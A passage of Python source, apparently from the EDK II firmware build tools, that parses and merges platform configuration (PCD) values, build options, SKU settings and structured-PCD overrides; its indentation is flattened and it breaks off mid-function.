self._Pcds.update(self._GetPcd(MODEL_PCD_PATCHABLE_IN_MODULE))
self._Pcds.update(self._GetPcd(MODEL_PCD_FEATURE_FLAG))
self._Pcds.update(self._GetDynamicPcd(MODEL_PCD_DYNAMIC_DEFAULT))
self._Pcds.update(self._GetDynamicHiiPcd(MODEL_PCD_DYNAMIC_HII))
self._Pcds.update(self._GetDynamicVpdPcd(MODEL_PCD_DYNAMIC_VPD))
self._Pcds.update(self._GetDynamicPcd(MODEL_PCD_DYNAMIC_EX_DEFAULT))
self._Pcds.update(self._GetDynamicHiiPcd(MODEL_PCD_DYNAMIC_EX_HII))
self._Pcds.update(self._GetDynamicVpdPcd(MODEL_PCD_DYNAMIC_EX_VPD))
self._Pcds = self.CompletePcdValues(self._Pcds)
self._Pcds = self.OverrideByFdfOverAll(self._Pcds)
self._Pcds = self.OverrideByCommOverAll(self._Pcds)
self._Pcds = self.UpdateStructuredPcds(MODEL_PCD_TYPE_LIST, self._Pcds)
self._Pcds = self.CompleteHiiPcdsDefaultStores(self._Pcds)
self._Pcds = self._FilterPcdBySkuUsage(self._Pcds)
self.RecoverCommandLinePcd()
return self._Pcds
## Retrieve [BuildOptions]
@property
def BuildOptions(self):
if self._BuildOptions is None:
self._BuildOptions = OrderedDict()
#
# Retrieve build option for EDKII and EDK style module
#
for CodeBase in (EDKII_NAME, EDK_NAME):
RecordList = self._RawData[MODEL_META_DATA_BUILD_OPTION, self._Arch, CodeBase]
for ToolChainFamily, ToolChain, Option, Dummy1, Dummy2, Dummy3, Dummy4, Dummy5 in RecordList:
if Dummy3.upper() != TAB_COMMON:
continue
CurKey = (ToolChainFamily, ToolChain, CodeBase)
#
# Only flags can be appended
#
if CurKey not in self._BuildOptions or not ToolChain.endswith('_FLAGS') or Option.startswith('='):
self._BuildOptions[CurKey] = Option
else:
if ' ' + Option not in self._BuildOptions[CurKey]:
self._BuildOptions[CurKey] += ' ' + Option
return self._BuildOptions
def GetBuildOptionsByPkg(self, Module, ModuleType):
local_pkg = os.path.split(Module.LocalPkg())[0]
if self._ModuleTypeOptions is None:
self._ModuleTypeOptions = OrderedDict()
if ModuleType not in self._ModuleTypeOptions:
options = OrderedDict()
self._ModuleTypeOptions[ ModuleType] = options
RecordList = self._RawData[MODEL_META_DATA_BUILD_OPTION, self._Arch]
for ToolChainFamily, ToolChain, Option, Dummy1, Dummy2, Dummy3, Dummy4, Dummy5 in RecordList:
if Dummy2 not in (TAB_COMMON,local_pkg.upper(),"EDKII"):
continue
Type = Dummy3
if Type.upper() == ModuleType.upper():
Key = (ToolChainFamily, ToolChain)
if Key not in options or not ToolChain.endswith('_FLAGS') or Option.startswith('='):
options[Key] = Option
else:
if ' ' + Option not in options[Key]:
options[Key] += ' ' + Option
return self._ModuleTypeOptions[ModuleType]
def GetBuildOptionsByModuleType(self, Edk, ModuleType):
if self._ModuleTypeOptions is None:
self._ModuleTypeOptions = OrderedDict()
if (Edk, ModuleType) not in self._ModuleTypeOptions:
options = OrderedDict()
self._ModuleTypeOptions[Edk, ModuleType] = options
DriverType = '%s.%s' % (Edk, ModuleType)
CommonDriverType = '%s.%s' % (TAB_COMMON, ModuleType)
RecordList = self._RawData[MODEL_META_DATA_BUILD_OPTION, self._Arch]
for ToolChainFamily, ToolChain, Option, Dummy1, Dummy2, Dummy3, Dummy4, Dummy5 in RecordList:
Type = Dummy2 + '.' + Dummy3
if Type.upper() == DriverType.upper() or Type.upper() == CommonDriverType.upper():
Key = (ToolChainFamily, ToolChain, Edk)
if Key not in options or not ToolChain.endswith('_FLAGS') or Option.startswith('='):
options[Key] = Option
else:
if ' ' + Option not in options[Key]:
options[Key] += ' ' + Option
return self._ModuleTypeOptions[Edk, ModuleType]
@staticmethod
def GetStructurePcdInfo(PcdSet):
structure_pcd_data = defaultdict(list)
for item in PcdSet:
structure_pcd_data[(item[0], item[1])].append(item)
return structure_pcd_data
@staticmethod
def OverrideByFdf(StruPcds,workspace):
if GlobalData.gFdfParser is None:
return StruPcds
StructurePcdInFdf = OrderedDict()
fdfpcd = GlobalData.gFdfParser.Profile.PcdDict
fdfpcdlocation = GlobalData.gFdfParser.Profile.PcdLocalDict
for item in fdfpcd :
if len(item[2]) and (item[0],item[1]) in StruPcds:
StructurePcdInFdf[(item[1],item[0],item[2] )] = fdfpcd[item]
GlobalPcds = {(item[0],item[1]) for item in StructurePcdInFdf}
for Pcd in StruPcds.values():
if (Pcd.TokenSpaceGuidCName,Pcd.TokenCName) not in GlobalPcds:
continue
FieldValues = OrderedDict()
for item in StructurePcdInFdf:
if (Pcd.TokenSpaceGuidCName,Pcd.TokenCName) == (item[0],item[1]) and item[2]:
FieldValues[item[2]] = StructurePcdInFdf[item]
for field in FieldValues:
if field not in Pcd.PcdFieldValueFromFdf:
Pcd.PcdFieldValueFromFdf[field] = ["","",""]
Pcd.PcdFieldValueFromFdf[field][0] = FieldValues[field]
Pcd.PcdFieldValueFromFdf[field][1] = os.path.relpath(fdfpcdlocation[(Pcd.TokenCName,Pcd.TokenSpaceGuidCName,field)][0],workspace)
Pcd.PcdFieldValueFromFdf[field][2] = fdfpcdlocation[(Pcd.TokenCName,Pcd.TokenSpaceGuidCName,field)][1]
return StruPcds
@staticmethod
def OverrideByComm(StruPcds):
StructurePcdInCom = OrderedDict()
for item in GlobalData.BuildOptionPcd:
if len(item) == 5 and (item[1], item[0]) in StruPcds:
StructurePcdInCom[(item[0], item[1], item[2] )] = (item[3], item[4])
GlobalPcds = {(item[0], item[1]) for item in StructurePcdInCom}
for Pcd in StruPcds.values():
if (Pcd.TokenSpaceGuidCName, Pcd.TokenCName) not in GlobalPcds:
continue
FieldValues = OrderedDict()
for item in StructurePcdInCom:
if (Pcd.TokenSpaceGuidCName, Pcd.TokenCName) == (item[0], item[1]) and item[2]:
FieldValues[item[2]] = StructurePcdInCom[item]
for field in FieldValues:
if field not in Pcd.PcdFieldValueFromComm:
Pcd.PcdFieldValueFromComm[field] = ["", "", ""]
Pcd.PcdFieldValueFromComm[field][0] = FieldValues[field][0]
Pcd.PcdFieldValueFromComm[field][1] = FieldValues[field][1][0]
Pcd.PcdFieldValueFromComm[field][2] = FieldValues[field][1][1]
return StruPcds
def OverrideByCommOverAll(self,AllPcds):
def CheckStructureInComm(commpcds):
if not commpcds:
return False
if len(commpcds[0]) == 5:
return True
return False
NoFiledValues = OrderedDict()
if CheckStructureInComm(GlobalData.BuildOptionPcd):
StructurePcdInCom = OrderedDict()
for item in GlobalData.BuildOptionPcd:
StructurePcdInCom[(item[0], item[1], item[2] )] = (item[3], item[4])
for item in StructurePcdInCom:
if not item[2]:
NoFiledValues[(item[0], item[1])] = StructurePcdInCom[item]
else:
for item in GlobalData.BuildOptionPcd:
NoFiledValues[(item[0], item[1])] = [item[2]]
for Guid, Name in NoFiledValues:
if (Name, Guid) in AllPcds:
Pcd = AllPcds.get((Name, Guid))
if isinstance(self._DecPcds.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName), None), StructurePcd):
self._DecPcds.get((Pcd.TokenCName, Pcd.TokenSpaceGuidCName)).PcdValueFromComm = NoFiledValues[(Pcd.TokenSpaceGuidCName, Pcd.TokenCName)][0]
else:
Pcd.PcdValueFromComm = NoFiledValues[(Pcd.TokenSpaceGuidCName, Pcd.TokenCName)][0]
Pcd.DefaultValue = NoFiledValues[(Pcd.TokenSpaceGuidCName, Pcd.TokenCName)][0]
for sku in Pcd.SkuInfoList:
SkuInfo = Pcd.SkuInfoList[sku]
if SkuInfo.DefaultValue:
SkuInfo.DefaultValue = NoFiledValues[(Pcd.TokenSpaceGuidCName, Pcd.TokenCName)][0]
else:
SkuInfo.HiiDefaultValue = NoFiledValues[(Pcd.TokenSpaceGuidCName, Pcd.TokenCName)][0]
for defaultstore in SkuInfo.DefaultStoreDict:
SkuInfo.DefaultStoreDict[defaultstore] = NoFiledValues[(Pcd.TokenSpaceGuidCName, Pcd.TokenCName)][0]
if Pcd.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_HII], self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_HII]]:
if Pcd.DatumType == TAB_VOID:
if not Pcd.MaxDatumSize:
Pcd.MaxDatumSize = '0'
CurrentSize = int(Pcd.MaxDatumSize, 16) if Pcd.MaxDatumSize.upper().startswith("0X") else int(Pcd.MaxDatumSize)
OptionSize = len((StringToArray(Pcd.PcdValueFromComm)).split(","))
MaxSize = max(CurrentSize, OptionSize)
Pcd.MaxDatumSize = str(MaxSize)
else:
PcdInDec = self.DecPcds.get((Name, Guid))
if PcdInDec:
PcdInDec.PcdValueFromComm = NoFiledValues[(Guid, Name)][0]
if PcdInDec.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_FIXED_AT_BUILD],
self._PCD_TYPE_STRING_[MODEL_PCD_PATCHABLE_IN_MODULE],
self._PCD_TYPE_STRING_[MODEL_PCD_FEATURE_FLAG],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX]]:
self._Pcds[Name, Guid] = copy.deepcopy(PcdInDec)
self._Pcds[Name, Guid].DefaultValue = NoFiledValues[( Guid, Name)][0]
if PcdInDec.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX]]:
self._Pcds[Name, Guid].SkuInfoList = {TAB_DEFAULT:SkuInfoClass(TAB_DEFAULT, self.SkuIds[TAB_DEFAULT][0], '', '', '', '', '', NoFiledValues[( Guid, Name)][0])}
return AllPcds
def OverrideByFdfOverAll(self,AllPcds):
if GlobalData.gFdfParser is None:
return AllPcds
NoFiledValues = GlobalData.gFdfParser.Profile.PcdDict
for Name,Guid,Field in NoFiledValues:
if len(Field):
continue
Value = NoFiledValues[(Name,Guid,Field)]
if (Name,Guid) in AllPcds:
Pcd = AllPcds.get((Name,Guid))
if isinstance(self._DecPcds.get((Pcd.TokenCName,Pcd.TokenSpaceGuidCName), None),StructurePcd):
self._DecPcds.get((Pcd.TokenCName,Pcd.TokenSpaceGuidCName)).PcdValueFromComm = Value
else:
Pcd.PcdValueFromComm = Value
Pcd.DefaultValue = Value
for sku in Pcd.SkuInfoList:
SkuInfo = Pcd.SkuInfoList[sku]
if SkuInfo.DefaultValue:
SkuInfo.DefaultValue = Value
else:
SkuInfo.HiiDefaultValue = Value
for defaultstore in SkuInfo.DefaultStoreDict:
SkuInfo.DefaultStoreDict[defaultstore] = Value
if Pcd.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_HII], self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_HII]]:
if Pcd.DatumType == TAB_VOID:
if not Pcd.MaxDatumSize:
Pcd.MaxDatumSize = '0'
CurrentSize = int(Pcd.MaxDatumSize,16) if Pcd.MaxDatumSize.upper().startswith("0X") else int(Pcd.MaxDatumSize)
OptionSize = len((StringToArray(Pcd.PcdValueFromComm)).split(","))
MaxSize = max(CurrentSize, OptionSize)
Pcd.MaxDatumSize = str(MaxSize)
else:
PcdInDec = self.DecPcds.get((Name,Guid))
if PcdInDec:
PcdInDec.PcdValueFromFdf = Value
if PcdInDec.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_FIXED_AT_BUILD],
self._PCD_TYPE_STRING_[MODEL_PCD_PATCHABLE_IN_MODULE],
self._PCD_TYPE_STRING_[MODEL_PCD_FEATURE_FLAG]]:
self._Pcds[Name, Guid] = copy.deepcopy(PcdInDec)
self._Pcds[Name, Guid].DefaultValue = Value
return AllPcds
def ParsePcdNameStruct(self,NamePart1,NamePart2):
TokenSpaceCName = PcdCName = DimensionAttr = Field = ""
if "." in NamePart1:
TokenSpaceCName, TempPcdCName = NamePart1.split(".")
if "[" in TempPcdCName:
PcdCName = TempPcdCName[:TempPcdCName.index("[")]
DimensionAttr = TempPcdCName[TempPcdCName.index("["):]
else:
PcdCName = TempPcdCName
Field = NamePart2
else:
TokenSpaceCName = NamePart1
if "[" in NamePart2:
PcdCName = NamePart2[:NamePart2.index("[")]
DimensionAttr = NamePart2[NamePart2.index("["):]
else:
PcdCName = NamePart2
return TokenSpaceCName,PcdCName,DimensionAttr,Field
def UpdateStructuredPcds(self, TypeList, AllPcds):
DynamicPcdType = [self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_DEFAULT],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_HII],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_VPD],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_DEFAULT],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_HII],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_VPD]]
Pcds = AllPcds
DefaultStoreMgr = DefaultStore(self.DefaultStores)
SkuIds = self.SkuIds
self.SkuIdMgr.AvailableSkuIdSet.update({TAB_DEFAULT:0})
DefaultStores = {storename for pcdobj in AllPcds.values() for skuobj in pcdobj.SkuInfoList.values() for storename in skuobj.DefaultStoreDict}
DefaultStores.add(TAB_DEFAULT_STORES_DEFAULT)
S_PcdSet = []
# Find out all possible PCD candidates for self._Arch
RecordList = []
for Type in TypeList:
RecordList.extend(self._RawData[Type, self._Arch])
for TokenSpaceGuid, PcdCName, Setting, Arch, SkuName, default_store, Dummy4, Dummy5 in RecordList:
SkuName = SkuName.upper()
default_store = default_store.upper()
SkuName = TAB_DEFAULT if SkuName == TAB_COMMON else SkuName
if SkuName not in SkuIds:
continue
TCName,PCName,DimensionAttr,Field = self.ParsePcdNameStruct(TokenSpaceGuid, PcdCName)
pcd_in_dec = self._DecPcds.get((PCName,TCName), None)
if pcd_in_dec is None:
EdkLogger.error('build', PARSER_ERROR,
"Pcd (%s.%s) defined in DSC is not declared in DEC files. Arch: ['%s']" % (TCName, PCName, self._Arch),
File=self.MetaFile, Line = Dummy5)
if SkuName in SkuIds and ("." in TokenSpaceGuid or "[" in PcdCName):
if not isinstance (pcd_in_dec, StructurePcd):
EdkLogger.error('build', PARSER_ERROR,
"Pcd (%s.%s) is not declared as Structure PCD in DEC files. Arch: ['%s']" % (TCName, PCName, self._Arch),
File=self.MetaFile, Line = Dummy5)
S_PcdSet.append([ TCName,PCName,DimensionAttr,Field, SkuName, default_store, Dummy5, AnalyzePcdExpression(Setting)[0]])
# handle pcd value override
StrPcdSet = DscBuildData.GetStructurePcdInfo(S_PcdSet)
S_pcd_set = OrderedDict()
for str_pcd in StrPcdSet:
str_pcd_obj = Pcds.get((str_pcd[1], str_pcd[0]), None)
str_pcd_dec = self._DecPcds.get((str_pcd[1], str_pcd[0]), None)
str_pcd_obj_str = StructurePcd()
str_pcd_obj_str.copy(str_pcd_dec)
if str_pcd_obj:
str_pcd_obj_str.copy(str_pcd_obj)
if str_pcd_obj.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_HII], self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_HII]]:
str_pcd_obj_str.DefaultFromDSC = {skuname:{defaultstore: str_pcd_obj.SkuInfoList[skuname].DefaultStoreDict.get(defaultstore, str_pcd_obj.SkuInfoList[skuname].HiiDefaultValue) for defaultstore in DefaultStores} for skuname in str_pcd_obj.SkuInfoList}
else:
str_pcd_obj_str.DefaultFromDSC = {skuname:{defaultstore: str_pcd_obj.SkuInfoList[skuname].DefaultStoreDict.get(defaultstore, str_pcd_obj.SkuInfoList[skuname].DefaultValue) for defaultstore in DefaultStores} for skuname in str_pcd_obj.SkuInfoList}
for str_pcd_data in StrPcdSet[str_pcd]:
if str_pcd_data[4] in SkuIds:
str_pcd_obj_str.AddOverrideValue(str_pcd_data[3], str(str_pcd_data[7]), TAB_DEFAULT if str_pcd_data[4] == TAB_COMMON else str_pcd_data[4], TAB_DEFAULT_STORES_DEFAULT if str_pcd_data[5] == TAB_COMMON else str_pcd_data[5], self.MetaFile.File if self.WorkspaceDir not in self.MetaFile.File else self.MetaFile.File[len(self.WorkspaceDir) if self.WorkspaceDir.endswith(os.path.sep) else len(self.WorkspaceDir)+1:], LineNo=str_pcd_data[6],DimensionAttr = str_pcd_data[2])
S_pcd_set[str_pcd[1], str_pcd[0]] = str_pcd_obj_str
# Add the Structure PCD that only defined in DEC, don't have override in DSC file
for Pcd in self.DecPcds:
if isinstance(self._DecPcds[Pcd], StructurePcd):
if Pcd not in S_pcd_set:
str_pcd_obj_str = StructurePcd()
str_pcd_obj_str.copy(self._DecPcds[Pcd])
str_pcd_obj = Pcds.get(Pcd, None)
if str_pcd_obj:
str_pcd_obj_str.copy(str_pcd_obj)
if str_pcd_obj.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_HII], self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_HII]]:
str_pcd_obj_str.DefaultFromDSC = {skuname:{defaultstore: str_pcd_obj.SkuInfoList[skuname].DefaultStoreDict.get(defaultstore, str_pcd_obj.SkuInfoList[skuname].HiiDefaultValue) for defaultstore in DefaultStores} for skuname in str_pcd_obj.SkuInfoList}
else:
str_pcd_obj_str.DefaultFromDSC = {skuname:{defaultstore: str_pcd_obj.SkuInfoList[skuname].DefaultStoreDict.get(defaultstore, str_pcd_obj.SkuInfoList[skuname].DefaultValue) for defaultstore in DefaultStores} for skuname in str_pcd_obj.SkuInfoList}
S_pcd_set[Pcd] = str_pcd_obj_str
if S_pcd_set:
GlobalData.gStructurePcd[self.Arch] = S_pcd_set.copy()
self.FilterStrcturePcd(S_pcd_set)
for stru_pcd in S_pcd_set.values():
for skuid in SkuIds:
if skuid in stru_pcd.SkuOverrideValues:
continue
nextskuid = self.SkuIdMgr.GetNextSkuId(skuid)
NoDefault = False
if skuid not in stru_pcd.SkuOverrideValues:
while nextskuid not in stru_pcd.SkuOverrideValues:
if nextskuid == TAB_DEFAULT:
NoDefault = True
break
nextskuid = self.SkuIdMgr.GetNextSkuId(nextskuid)
stru_pcd.SkuOverrideValues[skuid] = copy.deepcopy(stru_pcd.SkuOverrideValues[nextskuid]) if not NoDefault else copy.deepcopy({defaultstorename: stru_pcd.DefaultValues for defaultstorename in DefaultStores} if DefaultStores else {}) #{TAB_DEFAULT_STORES_DEFAULT:stru_pcd.DefaultValues})
if not NoDefault:
stru_pcd.ValueChain.add((skuid, ''))
if 'DEFAULT' in stru_pcd.SkuOverrideValues and not GlobalData.gPcdSkuOverrides.get((stru_pcd.TokenCName, stru_pcd.TokenSpaceGuidCName)):
GlobalData.gPcdSkuOverrides.update(
{(stru_pcd.TokenCName, stru_pcd.TokenSpaceGuidCName): {'DEFAULT':stru_pcd.SkuOverrideValues['DEFAULT']}})
if stru_pcd.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_HII], self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_HII]]:
for skuid in SkuIds:
nextskuid = skuid
NoDefault = False
if skuid not in stru_pcd.SkuOverrideValues:
while nextskuid not in stru_pcd.SkuOverrideValues:
if nextskuid == TAB_DEFAULT:
NoDefault = True
break
nextskuid = self.SkuIdMgr.GetNextSkuId(nextskuid)
if NoDefault:
continue
PcdDefaultStoreSet = set(defaultstorename for defaultstorename in stru_pcd.SkuOverrideValues[nextskuid])
mindefaultstorename = DefaultStoreMgr.GetMin(PcdDefaultStoreSet)
for defaultstoreid in DefaultStores:
if defaultstoreid not in stru_pcd.SkuOverrideValues[skuid]:
stru_pcd.SkuOverrideValues[skuid][defaultstoreid] = CopyDict(stru_pcd.SkuOverrideValues[nextskuid][mindefaultstorename])
stru_pcd.ValueChain.add((skuid, defaultstoreid))
S_pcd_set = DscBuildData.OverrideByFdf(S_pcd_set,self.WorkspaceDir)
S_pcd_set = DscBuildData.OverrideByComm(S_pcd_set)
Str_Pcd_Values = self.GenerateByteArrayValue(S_pcd_set)
if Str_Pcd_Values:
for (skuname, StoreName, PcdGuid, PcdName, PcdValue) in Str_Pcd_Values:
str_pcd_obj = S_pcd_set.get((PcdName, PcdGuid))
if str_pcd_obj is None:
print(PcdName, PcdGuid)
raise
if str_pcd_obj.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_HII],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_HII]]:
if skuname not in str_pcd_obj.SkuInfoList:
str_pcd_obj.SkuInfoList[skuname] = SkuInfoClass(SkuIdName=skuname, SkuId=self.SkuIds[skuname][0], HiiDefaultValue=PcdValue, DefaultStore = {StoreName:PcdValue})
else:
str_pcd_obj.SkuInfoList[skuname].HiiDefaultValue = PcdValue
str_pcd_obj.SkuInfoList[skuname].DefaultStoreDict.update({StoreName:PcdValue})
elif str_pcd_obj.Type in [self._PCD_TYPE_STRING_[MODEL_PCD_FIXED_AT_BUILD],
self._PCD_TYPE_STRING_[MODEL_PCD_PATCHABLE_IN_MODULE]]:
if skuname in (self.SkuIdMgr.SystemSkuId, TAB_DEFAULT, TAB_COMMON):
str_pcd_obj.DefaultValue = PcdValue
else:
if skuname not in str_pcd_obj.SkuInfoList:
nextskuid = self.SkuIdMgr.GetNextSkuId(skuname)
NoDefault = False
while nextskuid not in str_pcd_obj.SkuInfoList:
if nextskuid == TAB_DEFAULT:
NoDefault = True
break
nextskuid = self.SkuIdMgr.GetNextSkuId(nextskuid)
str_pcd_obj.SkuInfoList[skuname] = copy.deepcopy(str_pcd_obj.SkuInfoList[nextskuid]) if not NoDefault else SkuInfoClass(SkuIdName=skuname, SkuId=self.SkuIds[skuname][0], DefaultValue=PcdValue)
str_pcd_obj.SkuInfoList[skuname].SkuId = self.SkuIds[skuname][0]
str_pcd_obj.SkuInfoList[skuname].SkuIdName = skuname
else:
str_pcd_obj.SkuInfoList[skuname].DefaultValue = PcdValue
for str_pcd_obj in S_pcd_set.values():
if str_pcd_obj.Type not in [self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_HII],
self._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_HII]]:
continue
PcdDefaultStoreSet = set(defaultstorename for skuobj in str_pcd_obj.SkuInfoList.values() for defaultstorename in skuobj.DefaultStoreDict)
DefaultStoreObj = DefaultStore(self._GetDefaultStores())
mindefaultstorename = DefaultStoreObj.GetMin(PcdDefaultStoreSet)
str_pcd_obj.SkuInfoList[self.SkuIdMgr.SystemSkuId].HiiDefaultValue = str_pcd_obj.SkuInfoList[self.SkuIdMgr.SystemSkuId].DefaultStoreDict[mindefaultstorename]
for str_pcd_obj in S_pcd_set.values():
str_pcd_obj.MaxDatumSize = DscBuildData.GetStructurePcdMaxSize(str_pcd_obj)
Pcds[str_pcd_obj.TokenCName, str_pcd_obj.TokenSpaceGuidCName] = str_pcd_obj
Pcds[str_pcd_obj.TokenCName, str_pcd_obj.TokenSpaceGuidCName].CustomAttribute['IsStru']=True
for pcdkey in Pcds:
pcd = Pcds[pcdkey]
if TAB_DEFAULT not in pcd.SkuInfoList and TAB_COMMON in pcd.SkuInfoList:
pcd.SkuInfoList[TAB_DEFAULT] = pcd.SkuInfoList[TAB_COMMON]
del pcd.SkuInfoList[TAB_COMMON]
elif TAB_DEFAULT in pcd.SkuInfoList and TAB_COMMON in pcd.SkuInfoList:
del pcd.SkuInfoList[TAB_COMMON]
list(map(self.FilterSkuSettings, [Pcds[pcdkey] for pcdkey in Pcds if Pcds[pcdkey].Type in DynamicPcdType]))
return Pcds
@cached_property
def PlatformUsedPcds(self):
FdfInfList = []
if GlobalData.gFdfParser:
FdfInfList = GlobalData.gFdfParser.Profile.InfList
FdfModuleList = [PathClass(NormPath(Inf), GlobalData.gWorkspace, Arch=self._Arch) for Inf in FdfInfList]
AllModulePcds = set()
ModuleSet = set(list(self._Modules.keys()) + FdfModuleList)
for ModuleFile in ModuleSet:
ModuleData = self._Bdb[ModuleFile, self._Arch, self._Target, self._Toolchain]
AllModulePcds = AllModulePcds | ModuleData.PcdsName
for ModuleFile in self.LibraryInstances:
ModuleData = self._Bdb.CreateBuildObject(ModuleFile, self._Arch, self._Target, self._Toolchain)
AllModulePcds = AllModulePcds | ModuleData.PcdsName
return AllModulePcds
#Filter the StrucutrePcd that is not used by any module in dsc file and fdf file.
def FilterStrcturePcd(self, S_pcd_set):
UnusedStruPcds = set(S_pcd_set.keys()) - self.PlatformUsedPcds
for (Token, TokenSpaceGuid) in UnusedStruPcds:
del S_pcd_set[(Token, TokenSpaceGuid)]
## Retrieve non-dynamic PCD settings
#
# @param Type PCD type
#
# @retval a dict object contains settings of given PCD type
#
def _GetPcd(self, Type):
Pcds = OrderedDict()
#
# tdict is a special dict kind of type, used for selecting correct
# PCD settings for certain ARCH
#
AvailableSkuIdSet = copy.copy(self.SkuIds)
PcdDict = tdict(True, 4)
PcdList = []
# Find out all possible PCD candidates for self._Arch
RecordList = self._RawData[Type, self._Arch]
PcdValueDict = OrderedDict()
for TokenSpaceGuid, PcdCName, Setting, Arch, SkuName, Dummy3, Dummy4, Dummy5 in RecordList:
SkuName = SkuName.upper()
SkuName = TAB_DEFAULT if SkuName == TAB_COMMON else SkuName
if SkuName not in AvailableSkuIdSet:
EdkLogger.error('build ', PARAMETER_INVALID, 'Sku %s is not defined in [SkuIds] section' % SkuName,
File=self.MetaFile, Line=Dummy5)
if SkuName in (self.SkuIdMgr.SystemSkuId, TAB_DEFAULT, TAB_COMMON):
if "." not in TokenSpaceGuid and "[" not in PcdCName and (PcdCName, TokenSpaceGuid, SkuName, Dummy5) not in PcdList:
PcdList.append((PcdCName, TokenSpaceGuid, SkuName, Dummy5))
PcdDict[Arch, PcdCName, TokenSpaceGuid, SkuName] = Setting
for PcdCName, TokenSpaceGuid, SkuName, Dummy4 in PcdList:
Setting = PcdDict[self._Arch, PcdCName, TokenSpaceGuid, SkuName]
if Setting is None:
continue
PcdValue, DatumType, MaxDatumSize = self._ValidatePcd(PcdCName, TokenSpaceGuid, Setting, Type, Dummy4)
if MaxDatumSize:
if int(MaxDatumSize, 0) > 0xFFFF:
EdkLogger.error('build', FORMAT_INVALID, "The size value must not exceed the maximum value of 0xFFFF (UINT16) for %s." % ".".join((TokenSpaceGuid, PcdCName)),
File=self.MetaFile, Line=Dummy4)
if int(MaxDatumSize, 0) < 0:
EdkLogger.error('build', FORMAT_INVALID, "The size value can't be set to negative value for %s." % ".".join((TokenSpaceGuid, PcdCName)),
File=self.MetaFile, Line=Dummy4)
if (PcdCName, TokenSpaceGuid) in PcdValueDict:
PcdValueDict[PcdCName, TokenSpaceGuid][SkuName] = (PcdValue, DatumType, MaxDatumSize,Dummy4)
else:
PcdValueDict[PcdCName, TokenSpaceGuid] = {SkuName:(PcdValue, DatumType, MaxDatumSize,Dummy4)}
for ((PcdCName, TokenSpaceGuid), PcdSetting) in PcdValueDict.items():
if self.SkuIdMgr.SystemSkuId in PcdSetting:
PcdValue, DatumType, MaxDatumSize,_ = PcdSetting[self.SkuIdMgr.SystemSkuId]
elif TAB_DEFAULT in PcdSetting:
PcdValue, DatumType, MaxDatumSize,_ = PcdSetting[TAB_DEFAULT]
elif TAB_COMMON in PcdSetting:
PcdValue, DatumType, MaxDatumSize,_ = PcdSetting[TAB_COMMON]
else:
PcdValue = None
DatumType = None
MaxDatumSize = None
Pcds[PcdCName, TokenSpaceGuid] = PcdClassObject(
PcdCName,
TokenSpaceGuid,
self._PCD_TYPE_STRING_[Type],
DatumType,
PcdValue,
'',
MaxDatumSize,
{},
False,
None,
IsDsc=True)
for SkuName in PcdValueDict[PcdCName, TokenSpaceGuid]:
Settings = PcdValueDict[PcdCName, TokenSpaceGuid][SkuName]
if SkuName not in Pcds[PcdCName, TokenSpaceGuid].DscRawValue:
Pcds[PcdCName, TokenSpaceGuid].DscRawValue[SkuName] = {}
Pcds[PcdCName, TokenSpaceGuid].DscRawValueInfo[SkuName] = {}
Pcds[PcdCName, TokenSpaceGuid].DscRawValue[SkuName][TAB_DEFAULT_STORES_DEFAULT] = Settings[0]
Pcds[PcdCName, TokenSpaceGuid].DscRawValueInfo[SkuName][TAB_DEFAULT_STORES_DEFAULT] = (self.MetaFile.File,Settings[3])
return Pcds
@staticmethod
def GetStructurePcdMaxSize(str_pcd):
pcd_default_value = str_pcd.DefaultValue
sku_values = [skuobj.HiiDefaultValue if str_pcd.Type in [DscBuildData._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_HII], DscBuildData._PCD_TYPE_STRING_[MODEL_PCD_DYNAMIC_EX_HII]] else skuobj.DefaultValue for skuobj in str_pcd.SkuInfoList.values()]
sku_values.append(pcd_default_value)
def get_length(value):
Value = value.strip()
if len(value) > 1:
if Value.startswith(TAB_GUID) and Value.endswith(')'):
return 16
if Value.startswith('L"') and Value.endswith('"'):
return len(Value[2:-1])
if Value[0] == '"' and Value[-1] == '"':
return len(Value) - 2
if Value.strip().startswith("{CODE("):
tmpValue = RemoveCComments(Value)
return len(tmpValue.split(","))
if (Value[0] == '{' and Value[-1] == '}'):
return len(Value.split(","))
if Value.startswith("L'") and Value.endswith("'") and len(list(Value[2:-1])) > 1:
return len(list(Value[2:-1]))
if Value[0] == "'" and Value[-1] == "'" and len(list(Value[1:-1])) > 1:
return len(Value) - 2
return len(Value)
return str(max(get_length(item) for item in sku_values))
@staticmethod
def ExecuteCommand (Command):
try:
Process = subprocess.Popen(Command, stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)
except:
EdkLogger.error('Build', COMMAND_FAILURE, 'Can not execute command: %s' % Command)
Result = Process.communicate()
return Process.returncode, Result[0].decode(), Result[1].decode()
@staticmethod
def IntToCString(Value, ValueSize):
Result = '"'
if not isinstance (Value, str):
for Index in range(0, ValueSize):
Result = Result + '\\x%02x' % (Value & 0xff)
